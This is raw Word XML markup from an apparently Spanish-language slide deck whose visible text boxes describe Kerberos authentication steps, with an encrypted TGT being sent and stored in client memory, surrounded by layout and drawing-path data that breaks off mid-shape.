    <w:p w14:paraId="6A2A6D80" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78B7C5D3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D2D394C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AFBE604" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB3CCEA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18C92652" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="26"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77CFCE42" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="1629"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30BE7F4D" wp14:editId="17267DAC">
                <wp:extent cx="2181225" cy="739140"/>
                <wp:effectExtent l="9525" t="0" r="0" b="13334"/>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739140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4515E028" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="63" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="141" w:firstLine="88"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>1. Una vez que la verificación se completa y corrección, se envía</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="73452AA8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="339" w:lineRule="exact"/>
                              <w:ind w:left="403"/>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>respaldar un TGT</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="000000"/>
                                <w:spacing w:val="-5"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> encriptado </w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="30BE7F4D" id="Textbox 176" o:spid="_x0000_s1112" type="#_x0000_t202" style="width:171.7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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4515E028" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="63" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="141" w:firstLine="88"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>1. Una vez que la verificación se completa y corrección, se envía</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="73452AA8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="339" w:lineRule="exact"/>
                        <w:ind w:left="403"/>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>respaldar un TGT</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="000000"/>
                          <w:spacing w:val="-5"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> encriptado </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A28BC33" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07C8E50B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41079BDB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BF2F7A0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13129184" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A652701" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25963818" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF2A552" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DBD01E6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FE967E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE0339F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2729180E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8C9AE3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="231EF373" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="756E355A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2001AED7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9D2C5E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="88"/>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22144" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3AAFFB03" wp14:editId="0C3D7F87">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>124968</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>232505</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2005964" cy="954405"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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4" cy="954405"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0757408D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="257" w:firstLine="36"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>2. El cliente almacena TGT en la memoria y se puede re-</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="39541839" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="3" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="619" w:hanging="92"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Solicitado por el administrador de sesión local</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="3AAFFB03" id="Textbox 177" o:spid="_x0000_s1113" type="#_x0000_t202" style="position:absolute;margin-left:9.85pt;margin-top:18.3pt;width:157.95pt;height:75.15pt;z-index:-1569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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0757408D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="64" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="257" w:firstLine="36"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>2. El cliente almacena TGT en la memoria y se puede re-</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="39541839" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="3" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="619" w:hanging="92"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Solicitado por el administrador de sesión local</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC102D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="17491"/>
        </w:tabs>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56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C57C44" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId78"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="20" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="073D2874"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50400" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E5224ED" wp14:editId="205F6B7F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1754124</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>18283</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9271000" cy="651383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0" cy="6513830"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="9271000" cy="6513830"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="179" name="Image 179"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId67" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8683750" cy="6513608"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="180" name="Image 180"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId68" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1441449" y="141863"/>
                            <a:ext cx="6163436" cy="338074"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="181" name="Image 181"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId69" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="7697215" y="302899"/>
                            <a:ext cx="254000" cy="67818"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="182" name="Image 182"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId79" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="8042909" y="158627"/>
                            <a:ext cx="1227582" cy="321310"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="183" name="Graphic 183"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3799331" y="4134616"/>
                            <a:ext cx="2390140" cy="739140"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2390140" h="739140">
                                <a:moveTo>
                                  <a:pt x="2389631" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="739139"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2389631" y="739139"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2389631" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="E7E6E6"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="184" name="Graphic 184"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3799331" y="4134616"/>
                            <a:ext cx="2390140" cy="739140"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="2390140" h="739140">
                                <a:moveTo>
                                  <a:pt x="0" y="739139"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2389631" y="739139"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2389631" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="739139"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:ln w="12700">
                            <a:solidFill>
                              <a:srgbClr val="4471C4"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="185" name="Graphic 185"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="874521" y="2204342"/>
                            <a:ext cx="3665854" cy="2390775"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="3665854" h="2390775">
                                <a:moveTo>
                                  <a:pt x="3115678" y="44424"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2536063" y="60833"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2112264" y="88011"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1907159" y="104394"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1707896" y="123063"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1515618" y="144653"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1422273" y="156591"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1330960" y="169418"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1241933" y="183134"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1155319" y="197866"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1070991" y="213487"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="989203" y="230124"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="910209" y="247904"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="834009" y="266827"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="760730" y="287020"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="690359" y="308356"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="623316" y="331089"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="559435" y="355219"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="499110" y="380746"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="442341" y="407797"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="389001" y="436245"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="339598" y="466217"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="294005" y="497967"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="252222" y="531241"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214122" y="566039"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="179578" y="602234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148590" y="640080"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="120777" y="679069"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="96266" y="719455"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74930" y="760984"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="56388" y="803910"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="40767" y="847852"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27940" y="892810"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17653" y="938911"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9906" y="985901"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4445" y="1034034"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1143" y="1082802"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1132586"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="876" y="1182497"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="889" y="1182878"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3479" y="1232623"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3556" y="1234059"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7696" y="1283792"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7747" y="1284490"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13970" y="1338326"/>
                                </a:lnTo>
                                <a:lnTo>
